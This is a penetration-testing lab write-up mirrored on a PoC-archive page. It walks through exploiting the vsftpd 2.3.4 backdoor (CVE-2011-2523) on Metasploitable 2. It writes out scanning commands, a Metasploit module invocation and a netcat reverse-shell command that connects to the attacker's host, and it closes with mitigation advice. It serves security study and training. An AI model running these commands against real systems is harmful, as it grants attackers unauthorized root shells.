Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1310 CNY

100%
Buy Us a Coffee

CVE-2011-2523 PoC — vsftpd 操作系统命令注入漏洞

Source
https://github.com/seerat-fatima21/vsftpd-exploit
Associated Vulnerability
Title:vsftpd 操作系统命令注入漏洞 (CVE-2011-2523)
Description:vsftpd 2.3.4 downloaded between 20110630 and 20110703 contains a backdoor which opens a shell on port 6200/tcp.
Description
A step-by-step walkthrough of exploiting the vsFTPd 2.3.4 backdoor vulnerability (CVE-2011-2523) in a controlled lab environment, demonstrating reconnaissance, exploitation with Metasploit, and establishing a reverse shell.
Readme
# Penetration Testing Lab: vsFTPd 2.3.4 Backdoor Exploitation

This repository documents the process of identifying and exploiting the famous backdoor vulnerability in vsFTPd version 2.3.4 within a controlled lab environment (Metasploitable 2).

## Overview

During a routine penetration test, the vsFTPd service running on port 21 was identified as vulnerable. The service was found to be version 2.3.4, which contains a documented backdoor that allows unauthenticated remote command execution. This document details the steps taken to confirm the vulnerability and gain a reverse shell on the target system.

## Vulnerability Details

*   **Service:** vsFTPd (Very Secure FTP Daemon)
*   **Version:** 2.3.4
*   **CVE:** CVE-2011-2523
*   **Risk:** Critical (Remote Code Execution)

## Lab Setup

*   **Attacker Machine:** Kali Linux
*   **Target Machine:** Metasploitable 2
* **Network Configuration:** The machines were connected via a NAT and bridged network adapter, allowing the attacker to access services on the target's local IP address.

## Executive Summary
A critical backdoor was identified in the target's FTP service (vsFTPd 2.3.4). This vulnerability allows an unauthenticated attacker to gain remote command execution, ultimately leading to a full reverse shell on the system.

## Phase 1: Reconnaissance & Enumeration

The initial discovery was made using a port scan with `nmap`.

**Command:**
```bash
nmap -sS -sV -A <target-ip>
```

**Relevant Findings:**
```
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 2.3.4
...
```
## Phase 2: Vulnerability Identification
The version `2.3.4` is notoriously vulnerable. This was confirmed using `searchsploit`.

**Commands:**
```bash
searchsploit vsftpd 2.3.4
```
*Output revealed several public exploits, confirming the vulnerability.*

## Phase 3: Initial Exploitation Attempts

### Attempt 1: Standalone Python Exploit
A public Python exploit was mirrored and executed but failed due to compatibility issues.

**Commands:**
```bash
searchsploit -m unix/remote/49757.py
python 49757.py <target-ip>
```
*Result: Script error (incompatible with Python 3).*

### Attempt 2: Metasploit Module
The Metasploit Framework provides a reliable exploit module.

**Commands:**
```bash
msfconsole
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS <target-ip>
run
```
*Result: The exploit ran successfully, triggering the backdoor. However, a standard Metasploit shell was not established. The backdoor opens a root shell on port 6200.*

## Phase 4: Manual Shell Access
The Metasploit module confirmed the backdoor was present.

### Step 1: Verify backdoor activity.
```bash
telnet <target-ip> 6200
```
*Observation: Connection established but hung, indicating a listening shell.*

### Step 2: Establish a Reverse Shell
A reverse shell was set up using Netcat for stability.

**On Attacker (Kali): Start listener.**
```bash
nc -lvnp 4444
```

**On Target (via backdoor): Execute reverse shell.**
```bash
/bin/nc <attacker-ip> 4444 -e /bin/bash
```
  
`4444`: Listener port.  
`-e /bin/bash`: Executes bash shell.*

*Result: Netcat listener caught the connection, providing a root shell on the target.*

## Phase 5: Mitigation Strategies
Immediate Action: Upgrade vsFTPd to the latest version available from the official repository.

Network Controls: If upgrade is not possible, restrict FTP access at the network level (firewall) to only trusted IP addresses.

Compromise Assessment: A system running this vulnerable version should be considered fully compromised. A full forensic investigation and password resets are required.

Monitoring: Implement IDS/IPS rules to detect and block exploit attempts against this specific vulnerability.

## References
- Exploit-DB: [vsftpd 2.3.4 Backdoor Exploit](https://www.exploit-db.com/exploits/17491)
- CVE-2011-2523: [MITRE Advisory](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2523)
- NVD: [National Vulnerability Database Entry](https://nvd.nist.gov/vuln/detail/CVE-2011-2523)

## Disclaimer

This information is for **educational purposes only**. It is intended for use in authorized lab environments to understand attack methodologies and improve defensive strategies. Unauthorized testing against systems you do not own is illegal.
File Snapshot

Log in to view the POC file snapshot cached by Shenlong Bot

Log in to view
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →